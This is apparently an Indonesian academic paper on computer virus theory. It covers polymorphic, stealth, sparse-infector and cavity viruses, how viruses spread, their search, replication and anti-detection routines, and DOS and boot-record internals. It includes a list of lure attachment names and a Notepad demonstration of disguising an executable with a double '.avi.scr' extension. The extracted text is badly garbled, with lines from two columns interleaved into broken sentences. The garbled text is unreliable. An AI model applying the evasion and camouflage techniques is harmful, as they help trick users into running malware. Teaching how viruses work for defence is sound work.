ditambahkan rutin dan kunci untuk mendekripsikan
bermunculan utiliti yang memiliki metode lebih
diri. Pada setiap copy, rutin dan kunci inilah yang
kompleks
berbeda-beda.
kode
diantaranya adalah MTE 0.90 (Mutation Engine),
dimasukkan ke dalam suatu program dan diacak
TPE (Trident Polymorphic Engine), NED (Nuke
sedemikian rupa untuk membuat variasi yang
Encryption Device), dan DAME (Dark Avenger
berbeda sehingga bagi antivirus, virus yang sama
Mutation Engine).
kata
lain,
blok
pencipta
tahun
dunia
meskipun pada umumnya setiap copy dari sebuah
Dengan
selama
di
virus.
dalam
1993,
Balakangan
hal
aktivasi
life
banyak
polymorphic,
bisa terdeteksi sebagai virus lain yang berbeda.
Mengapa antivirus bisa bertindak demikian ? Hal ini
B. Virus Stealth
disebabkan karena untuk setiap jenis varian virus,
Virus dengan tipe ini adalah virus residen
produsen antivirus harus membuat kode spesifik
yang berusaha untuk menghindari deteksi yang
juga untuk bisa mendeteksinya. Sebuah program
menyembunyikan kehadirannya pada file yang
antivirus harus mampu memperkirakan beberapa
terinfeksi. Untuk mendukung hal ini stealth virus
pola signature yang mungkin terjadi (satu untuk
akan
setiap metode enkripsi yang memungkinkan) untuk
membaca file yang terinfeksi tersebut, sehingga
mengidentifikasikan satu jenis virus polymorphic ini.
komputer akan mendapati informasi file yang bukan
mencegat
panggilan
sistem
yang
akan
Konsep tentang virus polymorphic yang bisa
sebenarnya. Artinya, komputer telah dibohongi.
melakukan proses enkripsi sendiri, menjadi booming
Virus akan membodohi sistem komputer seolah-olah
di tahun 1992. Peristiwa ini pada akhirnya bermuara
segala sesuatu berjalan dengan normal, padahal
dengan ditemukannya sebuah program yang bisa
sudah
mengaktivasi kode polymorphic pada sebuah virus
membodohi atau menipu antivirus. Teknik ini adalah
biasa. Program ini biasa disebut sebagai program
teknik yang sudah canggih. Contoh dari virus ini
Life
adalah Asterik, AntiWin, Anticmos.
Generator
Polymorphic
Code.
Dengan
rusak.
Dengan
teknik
ini
virus
akan
program ini, banyak virus yang bisa dibuat menjadi
virus polymorphic dengan menambahkan beberapa
C. Sparse Infector
instruksi tertentu pada source code assembler.
Virus
yang
menggunakan
teknik
ini
Kemudahan inilah yang mengakibatkan banyaknya
merupakan virus yang cukup pintar dalam melihat
virus polymorphic baru bermunculan.
sisi psikologis orang. Virus akan mulai menginfeksi
Ledakan populasi virus polymorphic ini
ditandai
dengan
munculnya
virus
setelah
suatu
kondisi
terpenuhi,
seperti
Dedicated.
tanggal/bulan tertentu, batas pemakaian tertentu,
Pembuatan virus ini sendiri diilhami oleh virus MtE,
frekuensi eksekusi tertentu, dan kondisi-kondisi
yang muncul di awal musim semi tahun 1992.
lainnya. Misalnya, Jerusalem (hanya aktif setiap hari
Sementara virus MtE merupakan generasi pertama
Jum’at
dari virus yang menggunakan program life generator
Caterpillar (aktif saat perintah COPY atau DIR
MtE (Mutation Engine).
dieksekusi),
tanggal
13
setiap
Hafenstrasse
bulannya),
(aktif
Green
setiap
file
26
dieksekusi 5 kali), Shoe-B (infeksi pertama setelah
copy kode-kodenya kedalam file tersebut. Virus CIH
31 kali pemanggilan dan selanjutnya akan aktif
merupakan
setiap 4 kali pemanggilan), Sverdlov (aktif setiap
kesempatan emas ini.
contoh
virus
mampu
“melihat”
saat kecuali jika angka tanggal dan bulannya sama),
Swap (aktif setelah 10 menit dari waktu infeksi),
2.4.5.
Tonya (menginfeksi file yang memiliki ukuran antara
50 sampai 64303 byte).
Media Penyebaran Virus Komputer
Seperti telah diketahui sebelumnya bahwa
virus komputer tidak dapat menyebarkan dirinya
Virus jenis ini sengaja tidak langsung
sendiri
tanpa
bantuan
suatu
media.
Media
melakukan “tugas”nya supaya user tidak langsung
penyebaran ini sangat membantu sekali dalam
curiga tentang keberadaannya sehingga “waktu
penyebaran virus karena sebenarnya media ini
hidup”nya menjadi lebih panjang. Dampak yang
digunakan sebagai media komunikasi data dan
lambat terhadap file yang terinfeksi bisa membuat
informasi. Dalam hal ini, media penyebaran virus
user sedikit kebingungan mengenai apa yang
dibagi menjadi dua bagian, yaitu media fisik dan
sebenarnya telah terjadi.
internet.
D. Cavity (Spacefiller) Virus
2.4.5.1. Media Fisik
Virus ini akan replikasi dirinya sendiri ke
Media fisik yang sering digunakan orang
dalam empty space (ruang kosong) file. Beberapa
adalah disket, CD-R/RW, harddisk, flash disk, dan
file, untuk suatu alasan tertentu, baik sengaja atau
media penyimpanan lainnya. Walaupun sekarang
tidak, mempunyai suatu ruang kosong. Nah, ruang
disket sudah mulai ditinggalkan orang, tetapi
kosong inilah yang dimanfaatkan oleh virus untuk
penyebaran virus melalui disket masih cukup efektif
tempat replikasi kode-kodenya. Hal ini merupakan
dan efisien. Sebagai contoh adalah penyebaran
keuntungan bagi cavity (spacefiller) virus karena
virus Pesin yang mampu menyebar melalui disket
kode virus yang telah masuk ini tidak akan
antar warnet dan rental. Pada masa sekarang ini,
menambah panjang file tersebut. Misalnya adalah
CD-R/RW dan flash disk merupakan media fisik
virus Lehigh.
yang
Virus jenis ini merupakan virus yang sangat
susah
dibuat
karena
pembuat
virus
memiliki
“sumbangan
terbesar”
bagi
penyebaran virus. Mengapa demikian? Karena
harus
kedua media ini memiliki ukuran yang kecil tapi
mengetahui secara pasti besar ruang kosong
kapasitas simpan datanya sangat besar. Selain
tersebut sehingga virus yang akan dibuat nanti
efektif dan efisien, kedua media ini juga fleksibel
harus memiliki besar maksimum sebesar ruang
untuk dibawa kemana saja. Sebelumnya, jika
kosong file target. Tapi, setelah muncul suatu format
seseorang ingin memindahkan data yang berukuran
file windows baru yang dikenal dengan PE (Portable
besar, misalnya 100MB, maka ia harus membawa
Executable), maka peluang virus jenis ini menjadi
harddisk (kapasitas 1 disket adalah 1,44MB).
besar. Sebenarnya format file ini dibuat untuk
Pernah suatu ketika, bulan Desember 1991,
mempercepat loading and running program. Tapi
suatu CD ensiklopedi dari perusahaan terkenal,
hal ini mempunyai efek negatif, yaitu membuat
terinfeksi virus NoInt, padahal sudah 3800 kopi CD
“jurang pemisah” (ruang kosong) yang cukup besar
tersebut habis terjual. Beberapa software-software
dalam file tersebut sehingga virus bisa saja meng-
bajakan dalam bentuk CD yang beredar, bisa berisi
27
virus, misalnya CD software Dr. Hacker dan Mrs.
Virus ini dapat langsung menginfeksi walaupun
Crack, Power Utilities volume 2, dan juga beberapa
hanya mengunjungi suatu situs tertentu.
CD games.
IV.
PEMBAHASAN
3.1.
Komponen
2.4.5.2. Media Internet
Akhir-akhir ini virus yang menyebar dengan
Dasar
Pembentuk
Virus
Komputer
media internet sudah semakin banyak. Perubahan
tingkah laku orang dalam bertukar informasi dan
Setiap virus mempunyai beberapa rutin
berinteraksi, telah menciptakan virus jenis baru.
tertentu untuk menjamin kelangsungan hidupnya.
Dahulu, orang masih menggunakan disket untuk
Secara
bertukar informasi dan berinteraksi secara fisik
komponen dasar pembentuk virus, yaitu rutin
melalui pertemuan langsung (tatap muka). Tapi
pencari, pengganda dan anti deteksi. Setiap rutin
sekarang, bertukar informasi dan berinteraksi dapat
tersebut mempunyai tugas dan fungsi masing-
lebih mudah dan cepat melalui internet. Internet
masing yang saling mendukung satu dengan
sudah menjadi media interaksi dan pertukaran
lainnya.
umum,
ada
tiga
rutin
yang
menjadi
informasi yang sangat penting. Karena internet
memiliki jaringan yang sangat luas, maka para
3.1.1.
Rutin Pencari
pembuat virus mulai menjadikan internet sebagai
Rutin pencari merupakan ujung tombak dari
media penyebaran virus yang dianggap efektif dan
kesuksesan infeksi virus. Sebuah virus memerlukan
efisien. Virus ini biasanya menyebar lewat e-
daftar nama-nama file yang ada dalam suatu
mailataupun
direktori
pada
saat
fileyang
mengandung
games,
freeware,
men-download
virus.
dan
suatu
Program-program
shareware
untuk
mengenali
file
yang
menjadi
targetnya. Sebagai contoh adalah virus macro yang
memiliki
akan menginfeksi semua file berekstensi .DOC dan
kemungkinan terbesar sebagai sumber dari infeksi
.XLS. Rutin pencari dalam struktur virus mempunyai
virus.
tugas untuk mengumpulkan semua informasi yang
Kebanyakan virus yang menyebar adalah
diperlukan agar virus dapat membuat daftar data
melalui email attachment. Karena sebagian besar
semua file dan kemudian memilahnya dengan
pengguna jasa internet pasti menggunakan email
mencari file yang bisa diinfeksinya.
untuk berkomunikasi, maka attachment-attachment
ini dibuat semenarik mungkin, sepeti attachment
3.1.2.
Rutin Pengganda
dengan ekstensi .COM, .EXE, .BAT, .LNK, .VBS,
Sesuai dengan namanya, rutin pengganda
.PIF, .SCR, bahkan seringkali memiliki ekstensi
merupakan suatu rutin yang memiliki tugas untuk
ganda. Ada beberapa situs di internet yang memang
menggandakan diri dengan meng-copy kode objek
menjadi media penyebaran virus, antara lain situs
dalam file/program target. Penggandaan diri sendiri
porno, hacker, dan situs-situs lain yang tidak jelas
merupakan sifat utama dari sebuah virus komputer.
pengelolanya. Dengan adanya virus yang dibuat
Ada beberapa cara umum yang dilakukan oleh virus
dalam bahasa pemrograman JavaScript, maka
dalam menggandakan dirinya, antara lain :
kemungkinan infeksi virus menjadi sangat besar.
1. File/program yang akan diinfeksi, akan
dihapus
atau
diganti
namanya
dan
28
kemudian diciptakan file (yang berisi virus)
dan bekerja dengan mencari seluruh file yang
dengan menggunakan nama tersebut.
berekstensi COM (kecuali COMMAND.COM) pada
2. Program
virus yang sudah di-load ke
direktori aktif berikut subdirektorinya. Kemudian
memori akan langsung menginfeksi file-file
menempelkan dirinya pada bagian akhir dari file
lain dengan cara menumpangi seluruh
korban. Virus ini aktif pada setiap hari Jum’at ketiga
file/program yang ada.
belas dengan serangan yang menghapus file-file
dalam harddisk.
3.1.3.
Rutin Anti Deteksi
Ada juga virus yang menggunakan alternatif
Setelah kita mencapai tujuannya, yaitu
lainnya, misalnya dengan mendeteksi hentakan
mampu mencari file induk yang akan diinfeksi
keyboard. Bila keyboard tidak ditekan selama
dengan rutin pencari dan kemudian menginfeksinya
sekian menit, misalnya 10 menit, maka virus mulai
dengan bantuan rutin pengganda, virus masih perlu
diaktifkan. Trik ini termasuk cukup cerdik untuk
rutin anti deteksi yang sangat berperan dalam
memastikan bahwa user benar-benar tidak sedang
menghindari deteksi, baik dari pengetahuan user
berada di depan komputernya sehingga aktivitas
maupun dari pantauan program antivirus yang
virus yang menunggangi operasi komputer tersebut
memang merupakan predatornya. Rutin anti deteksi
dapat berjalan lancar tanpa sepengatahuan user.
ini bisa dibangun menyatu dengan rutin pencari atau
Rutin pencari, pengganda dan anti deteksi
rutin pengganda sehingga menjadi satu kesatuan
merupakan komponen mendasar yang ada dalam
yang terintegrasi. Tetapi bisa juga merupakan
setiap
bagian tersendiri.
mempunyai rutin-rutin tambahan yang lain di
virus.
Tentu
saja
virus-virus
komputer
Rutin anti deteksi ini sebenarnya adalah
samping ketiga rutin tersebut. Tujuan pemberian
rutin yang diperlukan untuk mengimbangi kerja rutin
rutin tambahan ini adalah untuk menghentikan
pencari. Maksudnya adalah bila rutin pencari
operasi normal komputer, menyebabkan kerusakan,
bekerja terus-menerus memeriksa setiap file yang
atau hanya sekedar hiburan yang menyenangkan
ada dalam disk, maka akan memakan waktu yang
bagi si pembuat virus tersebut, tetapi bagi orang lain
cukup lama dan menyebabkan aktivitas disk yang
bisa membuat jantung berdebar hebat.
tidak normal. Ini tentu cukup mengkhawatirkan
Rutin-rutin
tambahan
tersebut
akan
karena seorang user yang cukup waspada dengan
mempengaruhi karakter sebuah virus dan juga
aktivitas virus dapat menjadi curiga sehingga
berperan penting dalam mencapai tujuan virus, yaitu
keberadaan virus dapat diketahui. Hal ini tentu
kelangsungan hidup dan bereproduksi. Bila saja
sangat tidak diinginkan oleh para pembuat virus
hanya sedikit aktivitas disk, maka tidak ada orang
karena
menjadi
yang akan memperhatikan dan keberadaan virus
terhambat. Oleh karena itu, kerja rutin pencari ini
akan aman-aman saja karena tidak akan diketahui.
haruslah dibatasi untuk menghindari deteksi.
Ini lain halnya dengan virus-virus yang banyak
kelangsungan
hidup
virus
Sebagai alternatifnya, untuk mendukung
menarik
perhatian
banyak
orang
dengan
rutin anti deteksi, virus diaktifkan pada kondisi-
menampilkan kotak dialog “SALAM” atau langsung
kondisi tertentu. Misalnya pada tanggal-tanggal
menimbulkan kerusakan pada disk saat itu juga
tertentu, seperti virus dari keluarga Friday 13th.
sehingga orang awam pun akan bisa langsung
Virus ini merupakan virus parasit yang berbahaya
menebak keberadaan virus di komputernya dan
29
virus tersebut akan langsung dibasminya. Virus
3.2.3.
yang
mengadakan
mementingkan
Sebenarnya rutin manipulasi tak terlalu
kelangsungan hidupnya, lebih berperan sebagai
penting. Tetapi inilah yang sering mengganggu.
perangkat “delivery system” saja. Pembuatnya tidak
Biasanya rutin ini dibuat untuk :
peduli apakah virus tersebut akan musnah di dalam
a. Membuat tampilan atau pesan yang menggangu
aksinya ketika virus telah mencapai sasarannya.
pada layar monitor
Virus jenis ini mirip dengan pilot Kamikaze yang
b. Mengganti volume label disket
mengorbankan
c. Merusak struktur disk, menghapus file-file
hidupnya
tidak
untuk
manipulasi
seperti ini tidak akan dapat lolos dari “seleksi alam”.
Virus-virus
Kemampuan
untuk
menyelesaikan
sebuah misi. Dalam masalah ini, virus komputer
d. Mengacaukan kerja alat-alat I/O, seperti keyboard
dapat menjadi sebuah perangkat militer yang cukup
dan printer
efektif untuk menyelesaikan sebuah misi.
3.2.4.
3.2.
Kemampuan Dasar Virus Komputer
Definisi
umum
virus
komputer
Kemampuan
untuk
mendapatkan
informasi
adalah
Yakni
kemampuan
untuk
mendapatkan
sebuah program komputer yang biasanya berukuran
informasi tentang struktur media penyimpanan
kecil yang dapat menyebabkan gangguan atau
seperti letak boot record asli, letak tabel partisi, letak
kerusakan pada sistem komputer dan memiliki
FAT, posisi suatu file, dan sebagainya.
beberapa kemampuan dasar, diantaranya adalah
3.2.5.
sebagai berikut :
Kemampuan
untuk
memeriksa
keberadaan dirinya
3.2.1.
Kemampuan untuk memperbanyak diri
Sebelum
menyusupi
suatu
file,virus
Yakni kemampuan untuk membuat duplikat
memeriksa keberadaan dirinya dalam fileitu dengan
dirinya pada file-fileatau disk-disk yang belum
mencari ID (tanda pengenal) dirinya di dalam fileitu.
ditularinya,
Fileyang belum tertular suatu virus tentunya tidak
sehingga
lama-kelamaan
wilayah
penyebarannya semakin luas.
mengandung ID dari virus yang bersangkutan.
Kemampuan
3.2.2.
Kemampuan untuk menyembunyikan diri
ini
mencegah
penyusupan
yang
berkali-kali pada suatu fileyang sama.
Yakni kemampuan untuk menyembunyikan
dirinya dari perhatian user, antara lain dengan cara-
3.3. Cara Kerja Eksekusi Program
cara berikut :
a. Menghadang keluaran ke layar selama virus
b.
Bagaimana sebuah file yang tersimpan di
disk di-load ke memori dan dijalankan sebagai
bekerja, sehingga pekerjaan virus tak tampak
program ? Beginilah cara kerjanya :
oleh user.
Program virus ditempatkan diluar trackyang
dibuat DOS (misalkan track 41)
c. Ukuran virus dibuat sekecil mungkin sehingga
tidak menarik kecurigaan.
Sebuah file program di disk memiliki kode yang
diperlukan oleh CPU untuk melakukan tugas
berguna. Mungkin pula ada bagian dari file
program, berupa data untuk program tersebut
dan bukan merupakan instruksi prosesor. Atau
mungkin pula ada bagian dari file program yang
30
bukan merupakan instruksi atau data, tapi
menginterpretasikan
hanyalah tempat di area tersebut yang akan
COMMAND.COM segera meloncat ke proses
digunakan untuk menaruh data pada saat
yang mengendalikan ini.
program
tersebut
dijalankan.
File
program
ini,
Semua perintah eksternal DOS terdapat di disk
hanyalah citra magnetik dari program yang
dan di-load ke memori, diproses, lalu dibuang
disimpan dalam sebuah disk. Setelah file
dari memori. File perintah pendek ini ditandai
tersebut di-load ke memori, dan sistem operasi
dengan
mengalihkan CPU untuk memulai memproses
command (perintah). File ini harus bisa masuk
instruksi dalam program tersebut, file program
ke satu segmen memori (64K) dan merupakan
tersebut menjadi apa yang disebut proses.
citra biner dari memori sistem. DOS me-load file
Semua proses DOS memiliki sebuah titik masuk
COM ke memori dan mengalihkan kontrol ke
dan paling tidak satu titik keluar yang akan
byte pertama dari file tersebut.
mengembalikan kendali atas CPU ke proses
ekstensi
COM,
kependekan
dari
Program aplikasi ditandai dengan ekstensi EXE,
yang memuatnya, biasanya COMMAND.COM.
kependekan dari executable (dapat dijalankan).
paling tidaak ada satu proses yang sedang
File ini bukanlah gambaran memori langsung,
berjalan, bahkan di saat komputer tampaknya
panjangnya bisa berapa aja, asal lebih pendek
tidak bekerja apa-apa menanti masukan. Ketika
dari jumlah yang ada, dan perlu bantuan
DOS
monitor,
program loader DOS untuk bisa jalan. File ini
sedang
memiliki header yang berisi informasi untuk
memeriksa
loader tersebut, termasuk titik masuk, stack
apakah ada masukan dari keyboard. Walaupun
segment, dan ukuran program. Ada juga tabel
COMMAND.COM adalah interpreter perintah
relokasi berisikan daftar dari bagian program
yang umum dipakai atau proses tingkat atas
dimana
dari
berarti
disesuaikan agar alamat load yang terbaru
COMMAND.COM adalah satu-saatunya yang
dapat diketahui. Header tidak di-load dan
dapat
mengubah
prompt
tampak
di
COMMAND.COM-lah
mengendalikan,
sistem
yang
secara
teeratur
operasi,
digunakan.
layar
tidak
Banyak
sistem
yang
mengganti COMMAND.COM dengan proses
tingkat atas lainnya yang daapt didefinisikan
perintah-perintah
referensi
sisa
terhadap
dari
file
memori
dan
harus
memulai
memproses program pada titik masuk.
Fungsi load dan eksekusi merupakan bagian
dalam file konfigurasi CONFIG.SYS. saatu hal
dari sistem operasi. Karena pemakai hanya
yanng selalu ada pada proses tingkat atas
mengetikkan nama file, tanpa ekstensi, maka
adalah mereka keluar ke dirinya sendiri. Jika
tidak ada perbedaan di antara perintah internal
tidak, sistem operasi akan berhenti.
DOS, perintah eksternal DOS, dan file program
DOS
memanfaatkan
2
tipe
file
program.
(EXE).
Mula-mula
COMMAND.COM
Keduanya memiliki kode yang dapat dieksekusi;
menambahkan ekstensi COM ke perintah yang
perbedaannya terletak
pada cara program
diketik dan mencari file dengan nama itu. Jika
tersebut di-load ke memori oleh sistem operasi.
tidak ditemukan, ditambahkanlah ekstensi EXE
Ada beberapa perintah internal DOS yang tetap
pada perintah tersebut, dan mencari lagi. Lalu,
berada di memori sepanjang waktu, yaitu DIR,
COMMAND.COM mencari file dengan ekstensi
COPY, dan ERASE. Ketika COMMAND.COM
BAT. File batch bukanlah file program yang
31
berisikan instruksi untuk prosesor, tapi file yang
Bila tidak ada file IO.SYS atau IBMBIO.COM di
berisi
disket tersebut, akan muncul pesan “Non-system
instruksi
lebih
lanjut
untuk
COMMAND.COM. Dengan kata lain, file dengan
disk. Replace and
ekstensi
yang
sembarang tombol ditekan, boot sector di-load
ditemukan oleh COMMAND.COM akan di-loaad
kembali dan proses pencarian diulangi kembali.
ke memori dan kontrol akan dialihkan ke titik
Boot sector dari disket berisi daerah data yang
masuk. Jika akhirnya ekstensi BAT
yang
mendeskripsikan tata letak disket tersebut. Sektor
ditemukan,
akan
pertama dari disket ini dikenal dengan nama Blok
COM
atau
maka
EXE
pertama
COMMAND.COM
memproses perintah dala file batch tersebut.
press
any key.”.
Setelah
Parameter BIOS (BPB). Sedangkan sektor pertama
pada harddisk berisi program kecil yang mencari
apakah
boot sector DOS untuk harddisk tersebut. Sektor
program adalah file EXE atau COM? DOS tidak
pertama dari harddisk berisi daerah data yang
melihat dari ekstensi file, tapi dari 2 byte awal dari
mendeskripsikan partisi harddisk. Sektor pertama
file tersebut. Pada program yang dapat dieksekusi
dari harddisk ini lebih dikenal dengan sebutan
(EXE), kedua byte tersebut adalah karakter ASCII
Master Boot record (MBR). Kode pertama di MBR
MZ (inisial dari Mark Zbikowski, salah seorang yang
mencari boot sector DOS, membacanya ke memori
ikut mengembangkan DOS). Terlepas dari ekstensi
dan berhenti dengan menyerahkan kendali pada
file, bila 2 karakter awal adalah MZ, maka file
program boot record DOS. Boot record DOS ini
tersebut di-load sebagai file EXE dan bila bukan, file
berisi data yang sama seperti sektor pertama disket.
tersebut di-load sebagai citra memori biner.
Karena itu, MBR hanyalah langkah tambahan dalam
Bagaimana
DOS
menentukan
prosedur start-up yang menjadi ciri sistem sebuah
harddisk.
3.4. Cara Kerja Boot Record
Waktu komputer dinyalakan atau di-reset,
3.5. Kamuflase Virus melalui Ekstensi Ganda
rutin Power On Self-Test (POST) yang berada di
Permasalahan kamuflasebukanlah perkara
Random Only Memory (ROM) berusaha me-load
masa kini saja. Sejak zaman Yunani masalah
setiap sektor di disket pertama di drive pertama. Bila
kamuflase telah dikenal dan dimanfaatkan, yaitu
tidak ada respon dari disket tersebut, rutin ROM
ketika terjadi perang antara Yunani dan Troy. Meski
akan mencoba me-load sektor harddisk pertama.
dikepung selama 10 tahun, Troy tidak jatuh juga.
Setelah isi sektor ini di-load ke memori, kendali
Sehingga
dialihkan ke titik ini. Sektor pertama dari disket
menyusupkan tentaranya dalam sebuah kuda kayu
berbeda dari sektor pertama harddisk, namun
raksasa yang berongga yang dikirimkan ke Troy.
keduanya mengerjakan tugas permulaan yang
Sinon,
sama, yaitu me-load DOS. Pada boot sector dari
meyakinkan Troy untuk membawa kuda kayu
disket terdapat program kecil yang me-load direktori
tersebut masuk ke kota. Di malam hari, tentara yang
disket tersebut dan mencari file DOS, IO.SYS atau
dikamuflasekan dalam kuda kayu dikeluarkan oleh
IBMBIO.COM. Setelah file tersebut ditemukan, file
Sinon yang mengakhiri Trojan War.
Yunani
seorang
mengganti
mata-mata
strategi
Yunani,
dengan
berhasil
tersebut dibaca ke memori dan kendali dialihkan ke
Kamuflase digunakan juga pada virus untuk
sana agar loading sistem operasi dapat berlanjut.
mengelabui para pengguna komputer. Diantaranya
32
dari nama file yang digunakan, virus menggunakan
Windows karena merupakan ekstensi yang telah
nama-nama yang memanfaatkan sifat ingin tahu
dikenal oleh Windows sendiri. Kenapa begitu?
seorang
Movie,
Karena pada kebanyakan sistem operasi Windows,
XXX_Teens,
opsi “Hide file extensions for known file types”
manusia.
Screen_Saver,
AvrilFans,
atau
Misalnya
saja
Your_details,
AvrilSmiles.
Atau
bisa
juga
diaktifkan. Opsi ini dapat Anda akses melalui kotak
menggunakan nama-nama seperti di bawah ini
dialog Folder Options. Akibatnya, ekstensi .scr akan
untuk attachment-nya (virus yang menyebar melalui
disembunyikan. Maka nama tersebut akan terlihat
e-mail) :
“Humor.ZIP” yang merupakan suatu nama dengan
ekstensi yang tidak berbahaya bila diklik.
fun; humor; docs; info; sorry_about_yesterday;
me_nude; Card; SETUP; stuff; YOU_are_FAT!;
3.5.1.
HAMSTER; news_doc; images; pics
File Aplikasi Berektensi PIF dan SCR
File
aplikasi
yang
merupakan
hasil
kompilasi suatu kompiler, semacam Borland Delphi,
Nama-nama tersebut cukup mengundang
Turbo Pascal, C++ Builder, Visual Basic, dan lain
rasa ingin tahu manusia untuk mengklik dan
sebagainya, akan mempunyai ekstensi EXE atau
menjalankan
sebenarnya
COM. File inilah yang dinamakan dengan program
Selain
itu
yang para user akan menggunakannya tanpa ia
kamuflase juga diterapkan pada ekstensi file yang
mengetahui bagaimana dan apa yang dilakukan
digunakan. Virus ini mempunyai nama attachment
oleh program tersebut. Terlebih lagi source code
yang terdiri dari tiga bagian. Formatnya seperti di
atau kode program tersebut tidak disertakan,
bawah ini:
sehingga dia tidak tahu proses dan perintah apa
merupakan
attachment
file
yang
yang
berbahaya.
NamaFile + Ekastensi_1 + Ekstensi_2
yang akan dilakukan oleh program ini. Para user
akan pasrah bila menggunakan program. Ini adalah
program secara umum. Program tersebut bisa jadi
Untuk nama file, digunakan salah satu dari
merupakan program yang baik, misalnya mampu
deretan nama-nama yang telah disebut di atas.
memainkan file MP3 atau avi, dan bisa juga
Sedangkan untuk ekstensi_1 dipilih salah satu dari
program
tiga pilihan di bawah ini :
harddisk. Bila seorang user menjalankan file ini ia
.DOC
akan dihadapkan pada dua pilihan, yaitu file ini baik
.MP3
atau
.ZIP
Probabilitasnya 50:50, suatu peluang yang cukup
Dan untuk ekstensi_2 dipilih salah satu dari dua
besar untuk memperoleh kebaikan dan peluang
pilihan ini :
yang besar pula untuk mendapatkan kerusakan dari
pif
akibat penggunaan file. Untuk alasan inilah seorang
scr
user yang kritis dia tidak akan mau menjalankan
Misalnya secara random (acak) suatu virus
suatu
yang
file
file
ini
jahat
buruk
dari
yang
dan
dapat
memformat
bersifat
sumber-sumber
destruktif.
yang
tidak
memberikan nama untuk attachment-nya dengan
dipercayainya. Atas dasar ini maka para pembuat
nama “ Humor.ZIP.scr”. Ekstensi .scr (sebagai
virus mengganti ekstensi file virus mereka dengan
ekstensi screen saver) akan disembunyikan oleh
SCR atau PIF. Catat juga bahwa dengan ekstensi
33
tersebut file virus yang mereka buat dapat secara
Kita perlu kelinci percobaan dan yang ada
penuh berjalan tanpa error sedikitpun layaknya
pada semua komputer adalah Notepad. Copy-kan
sebuah file berekstensi EXE. Selain itu pada
saja file Notepad.exe yang berada di C:\Windows ke
beberapa
folder
server
tidak
menghendaki
adanya
attachment dengan ekstensi EXE atau COM.
My
Documents.
Sehingga
Anda
tidak
mengutak-utik aplikasi Notepad yang digunakan
oleh Windows.
3.5.2.
Simulasi Ekstensi Ganda
Bagian simulasi ini merupakan bagian yang
4. Mengganti Ekstensi Notepad
diperuntukkan agar lebih jelas memahami masalah
Beralihlah ke folder My Documents. File
ekstensi ganda. Kita akan menambahkan dua buah
Notepad tersebut mempunyai nama dan ekstensi
ekstensi pada sebuah file aplikasi executable.
“Notepad.exe”. Tekan tombol F2 dan gantilah
Aplikasi tersebut adalah Notepad yang ada pada
menjadi
semua komputer Windows, sehingga dapat lebih
konfirmasi yang tampil, tekan saja tombol Yes.
“Notepad.avi.scr”.
Pada
kotak
dialog
mudah dalam mengikuti simulasi ini. Dengan
simulasi ini, dapat melihat bahwa suatu file aplikasi
5. Aktifkan Opsi
dapat diganti ekstensinya menjadi “.scr” dan dapat
Tampilkan lagi kotak dialog Folder Options.
secara penuh dijalankan tanpa error dan hambatan
Beri tanda check pada opsi “Hide file extensions for
sama sekali. Inilah salah satu cara kamuflase yang
known file types”, sehingga ekstensi yang dikenal
digunakan pada banyak virus dan trojan. Berikut ini
akan disembunyikan. Tekan tombol OK untuk
adalah langkah-langkah simulasi file berekstensi
menutup kotak dialog Folder Options.
ganda :
6. Ingin Tahu dan Terjebak
1. Panggil Windows Explorer
Jalankan Windows Explorer dengan menu
Sekarang Notepad terlihat dengan nama
Notepad.avi
dan
dapat
penuh
dijalankan.
Start | Programs | Windows Explorer. Kemudian pilih
Bagaimana bila aplikasi Notepad tersebut diganti
menu View | Folder Options atau Tools | Folder
dengan virus ? Tentu banyak orang yang tertipu
Options untuk menampilkan kotak dialog Folder
untuk menjalankan file aplikasi tersebut tanpa
Options.
menyadari bahaya yang mengintip dibaliknya.
3.6. Sistem Virus Komputer
2. Tab View
Di kotak dialog Folder Options, pilih tab
File/ Program
Mencari
Informasi
Memeriksa
file/program
View. Kemudian kosongkan tanda check pada opsi
“Hide file extensions for known file types”, akibatnya
ekstensi file pada Explorer akan terlihat dan tidak
File/Program
Terinfeksi
Anti Deteksi
Replikasi
disembunyikan. Tekan tombol OK.
Gambar 3.1. Bagan Cara Kerja Virus Komputer
3.6.1.
3. File Kelinci Percobaan
Mencari Informasi
Pada umumnya suatu virus memerlukan
daftar nama-nama file yang ada dalam suatu
34
directory agar
dia dapat mengenali program-
Ciri
utama
dari
adalah
menggandakan
virus makro yang akan menginfeksi semua file
menginfeksi
berekstensi
itu
apabila telah menemukan “calon korban”nya, maka
kemampuan
ia akan mengenalinya dengan memeriksanya, jika
mengumpulkan informasi itu diperlukan agar virus
belum terinfeksi maka sang virus akan memulai
dapat
terus
aksinya untuk menginfeksi dengan cara menuliskan
memilahnya dengan mencari file-file yang bisa
byte pengenal pada program/file tersebut, dan
diinfeksi. Biasanya data ini tercipta saat program
kemudian
yang terinfeksi kemudian dieksekusi. Sang virus
dengan cara meng-copy kode objek virus ke dalam
akan segera melakukan pengumpulan data dan
file/program “korban”nya. Ada 2 cara yang dilakukan
menaruhnya di memori, sehingga apabila komputer
oleh virus untuk melakukan replikasi adalah :
dan
menemukannya,
.xls.
Setelah
disinilah
membuat
daftar/data
semua
virus
file,
(replikasi)
mampu
program apa saja yang akan dia infeksi, misalnya
.doc
diri
virus
file/program
melakukan
lainnya.
replikasi
dengan
cara
Suatu
virus
dirinya
sendiri
dimatikan semua data hilang tetapi akan tercipta
setiap program bervirus dijalankan dan biasanya
a. Direct
dibuat sebagai hidden file oleh virus .
Virus langsung menginfeksi file/program yang
menjadi targetnya. File/program yang akan
3.6.2.
Memeriksa File/Program
Suatu
memeriksa
virus
suatu
juga
diinfeksi
harus
program
bisa
untuk
dihapus
kemudian
yang akan diinfeksi,
atau
diciptakan
diubah
suatu
namanya
file/program
menggunakan nama itu dengan menggunakan
misalnya ia bertugas menulari program berekstensi
virus tersebut.
.DOC dan .XLS, maka dia harus memeriksa apakah
file dokumen ini telah terinfeksi atau belum, karena
b. Indirect
jika sudah maka dia akan percuma menularinya 2
Virus menginfeksi memori. Program virus yang
kali.
sudah
Ini
sangat
berguna
untuk
meningkatkan
kemampuan
suatu virus dalam hal
menginfeksi
suatu
file/program.
kecepatan
Yang
dieksekusi/load
ke
memori
akan
langsung menulari file/program lain dengan cara
umum
menumpangi seluruh file/program yang ada.
dilakukan oleh virus adalah memberi ID (tanda
pengenal) pada
file/program yang telah terinfeksi
4.2.4. Antideteksi
sehingga mudah untuk dikenali oleh virus tersebut.
Kemampuan menyembunyikan diri ini harus
Jadi sebelum menyusupi suatu file,virus memeriksa
dimiliki
keberadaan dirinya dalam fileitu dengan mencari ID
pekerjaan, baik dari awal sampai berhasilnya
di dalam fileitu. Fileyang belum terinfeksi suatu virus
